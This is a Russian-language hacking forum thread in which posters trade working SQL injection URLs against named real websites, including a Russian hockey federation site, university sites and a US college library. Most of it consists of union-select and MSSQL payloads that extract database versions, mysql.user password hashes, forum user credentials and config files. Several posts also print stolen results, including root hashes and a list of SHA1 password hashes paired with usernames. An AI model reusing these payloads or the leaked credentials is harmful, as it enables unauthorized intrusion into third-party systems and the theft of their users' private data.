SQL Инъекции

Идею дал, дораскрутите сами

Code:

http://triplebuffer.devmaster.net/file.php?id=-7+union+select+1,2,convert(version()+using+latin1)/*&page=2

 

sql-not_fin

Фотосайт.ру

Code:

http://www.photosight.ru/pforum/showflat.php?Cat=&Board=photo_common&page=0&view=collapsed&sb=5&o=&fpart=all&Number=-658026+union+select+1,2,3,aes_decrypt(aes_encrypt(concat_ws(0x3a,user(),version(),database()),0x55),0x55)/*

вывод в заголовке, довести до ума не получилось, таблицы не подобрал.

 

2Серенький

Code:

http://www.photosight.ru/pforum/showflat.php?Cat=&Board=photo_common&page=0&view=collapsed&sb=5&o=&fpart=all&Number=-658026+union+select+1,2,3,aes_decrypt(aes_encrypt(concat_ws(0x3a,user,password),0x55),0x55)%20from%20mysql.user/*

 

Code:

http://kosmopoisk.org/ufo_technology/show1.html?id=-1+union+select+1,2,3,4,concat(database(),char(58),user(),char(58),version()),6,7,8/*
http://kosmopoisk.org/ufo_technology/show1.html?id=-1+union+select+1,2,3,4,5,6,7,8+from+guestbook/*

Code:

http://www.setbook.ru/announces-r.php?id=5499&pageid=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version()),4,5/*
http://www.setbook.ru/announces-r.php?id=5499&pageid=-1+union+select+1,2,concat(username,char(58),user_password),4,5+from+phpbb_users+limit+1,1/*

Code:

http://www.aqualung.ru/konkurs.php?photo=-1+union+select+1,convert(concat(database(),char(58),user(),char(58),version()),char),3,4,5,6,7,8/*

 

Предлагаю Вашему вниманию очень пикантную скулю . Федерация хоккея России. PHP-скрипт имеет права рута доступа к мускулу, поэтому можно творить очень многое, а именно:

Code:

http://www.1tvcup.fhr.ru/news/?id=-1+union+select+1,2,3,concat(user,':',password)+from+mysql.user/*

Хотя есть и более простой способ увести пароль от MySQL - через конфиг phpbb (Смотреть "исходники" страницы)

Code:

http://www.1tvcup.fhr.ru/news/?id=-1+union+select+1,2,3,load_file('/home/www/htdocs/www/conf/config.php')/*

А вот и юзвери форума:

Code:

http://www.1tvcup.fhr.ru/news/?id=-1+union+select+1,2,3,concat(username,':',user_password,':',user_icq)+from+home.phpbb_users+limit+1/*

Ну и конечно, админы, там их докуя фроде

Code:

http://www.1tvcup.fhr.ru/news/?id=-1+union+select+1,2,3,concat(login,'%20:%20',password,'%20:%20',comment)+from+online_feb.fhr_admins+limit+0,1/*

Также отлично работает into outfile.

P.S. Пожалуйста, не хакайте, только ознакамливаемся.

 

5-я версия мускула, лимит в помощь, 30 таблиц.. ответ где то там)

Code:

http://www.maplestoryatlas.com/field.php?id=-33+union+select+1,TABLE_NAME,version()+from+INFORMATION_SCHEMA.TABLES+limit+1,1/*

Здесь все тривиально

Code:

http://tenleaders.com/field.php?id=-12+union+select+concat_ws(char(58),user,password),2,3+from+mysql.user/*

 

edu-all.ru

_хмм_

 

Code:

http://www.turkuaz.us/news_det.php?newsId=-587+union+select+1,user(),database(),version(),5,6,7,8,9/*&catId=32

Code:

http://lonuestro.us/sectionfiles/article.php?id=-218+union+select+1,database(),version(),4,5,6,7,user(),9,10,11,12/*

так сильно не увлекался находкой таблиц. . .

 

Чтобы увидеть скулю, нужна регистрация.
Для тех, кому влом регистрироваться -
Login - kokok
Pass - 123456

Code:

http://www.myflavour.nl/forum.php?view=write&tid=748&action=reply&quote=-20244%20union%20select%201,2,user()/*

Code:

http://www.geelix.com/hud.php?id=-238622154%20union%20select%201,2,concat_ws(char(58),idUser,logins,email,passw)%20from%20user/*

Code:

http://www.cbisis.be/baptises.php?an=-1992%20union%20select%20id,concat_ws(char(58),username,password,email,icq),3,4%20from%20cbisis.forum_users/*

 

Code:

http://www.parks.it/news/dettaglio.php?id=-1221+union+select+1,user,password,4,user(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+mysql.user/*

root:0a9236882f7cf8a1
[email protected]

 

sql-inj

http://www.naturmed.ru

mysql 5

смотрим таблицы

смотрим количество таблиц

их всего 25, но что-то ни черта интересного среди них не нашел.

Пелевин http://pelevin.nov.ru

 

Продолжаем тему выпускников (Предыдущие МГИМО и МФТИ) Коллекция пополняется!
Теперь НГТУ(Новочеркасск)
www.ngtu.ru

Code:

http://www.ngtu.ru/info/info.php?id=-1+ union+select+database() ,user(),version(),4,5 ,6,7,8,9,10,11,12,13,14,15,16/*

Code:

http://www.ngtu.ru/info/info.php?id=-1+unio n+select+email,icq,passw,4,5 ,6,7,8,9,10,11,12,13,14,15,16+from+users/*

Все стандартно аськи, почта, пароли (в открытом виде). Пользователей 4055!

 

___[53x]Shadow

Code:

http://www.ngtu.ru/info/info.php?id=-1+union+select+username,user_password,user_icq,user_email,5,6,7,8,9,10,11,12,13,14,15,16+from+phpbb_users/*

 

Коллекция выпускников

МИФИ
www.mephi1996.ru

Code:

http://www.mephi1996.ru/news.php?id=-1+union+select+1 ,user(), 3,version(),5,database()/*

user: [email protected]
version: 4.0.27
database: tyurin

Нашел еще таблицу users, правда похоже права на select нет

 

Code:

http://www.fof.ru/model.php?id=1+and+1=-1+union+select+1,2,3,null,concat(user,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+mysql.user/*

root:51aa86276d773238:66j89

 

sql_not-finished

http://www.progz.ru/

http://ecoportal.ru/

http://www.prokredo.ru/ mysql 5

1:mooncat:sql:[email protected]:Andrey Tarskov:1

 

Code:

http://www.acconcept.ru/news/news.php?id=-124+union+select+1,passwd,3,4,membername,6,7,8+from+smf_members/*

Code:

d286012284d40b859c81b773c260ea4d03821c1c:Natali
53f6dbb9fd0bb1e45bdb114ffdeb5167bec445d1:mofa
be1e6dcf9cd70f318bad866c521bc3bb8750889d:Rust
924e378db9cb2016fcb0e813ce6bcc735cc3461b:Fadin Denis
a119561acfc07337fdf05ce695343532c011df58:Alexander.A.Sorokin
52a4a8123268ee014ce79b8e7cb30e4f70918858:SFU
e93b7fe16991598e7bc523fba140adce6ffcb303:KamV
156da86923db93bf020958f39991fbd3b73d490c:Алексей Целищев
c960e53946d1c4ea02c5516c82d20d0e52e6999a:reduhin
824ef2d6d0aaf1eb500fdfb4e5aa7c1673ca7895:Андрей
a3497dbf28bb4a05e88feea07efed24b150fc638:NIKITA
0af4ae9b26fb793e93ca52f9735fe4aae9cb1931:елисеенко
a01249b67aa2af18b39cf1c6513b8f621ecf63c2:Кучкаров
c78840fd55285ff4d96d8f15016fd2de6ef9b717:DRIGGER
660b797b6e8d6ebf4e7e483069b973c5ba564d3a:lzanuda
a13d103e2ddbdfeb417c3843c55d2aca7d7adb4c:синичка

Napalmed -

Code:

http://www.oppozicia.com/index.php?lang=1&part_id=39&year_id=2007&month_id=-01+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3/*

admins/users - еще есть форум, походу самописный...

 

Чёт я никак не пойму вродибы подобрал а уязвимость не проявляется !

 

Mssql

Во моя первая на MSSQL

eres.geneseo.edu

Code:

http://eres.geneseo.edu/library/research/metajournalsearch.asp?lettersearch=b'+or+1=@ @version- -

Имя БД: Serials
Имя пользователя: Serials
Версия: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1)

Находим все таблицы:

Code:

http://eres.geneseo.edu/library/research/metajournalsearch.asp?lettersearch=b'+or+  1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('VALID_SUBJECT_CODES','dtproperties','eJournals','Item_Subject_Linker','LIBRARY_COMPLETENESS','LIBRARY_INDEX','LIBRARY_LOCATION','LIBRARY_PUBLICATION','LIBRARY_REORDER','LIBRARY_STATUS','LIBRARY_SUBJECT','LIBRARY_TITLE','pJournals','Sfx_e_journals','sJournals','Subject_Codes','sysconstraints','syssegments','VALID_BUILDING_CODES','VALID_COLLECTION_CODES','VALID_INDEX_CODES'))- -

Интересных таблиц не увидел, по этому для примера

Столбцы таблицы eJournals

Code:

http://eres.geneseo.edu/library/research/metajournalsearch.asp?lettersearch=b'+or+ 1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='eJournals'+AND+COLUMN_NAME+NOT+IN+('ID','Location','Title','Dates','Database','Building','Collection','Volumes_Held','Free'))- -

 

хороший сайт =)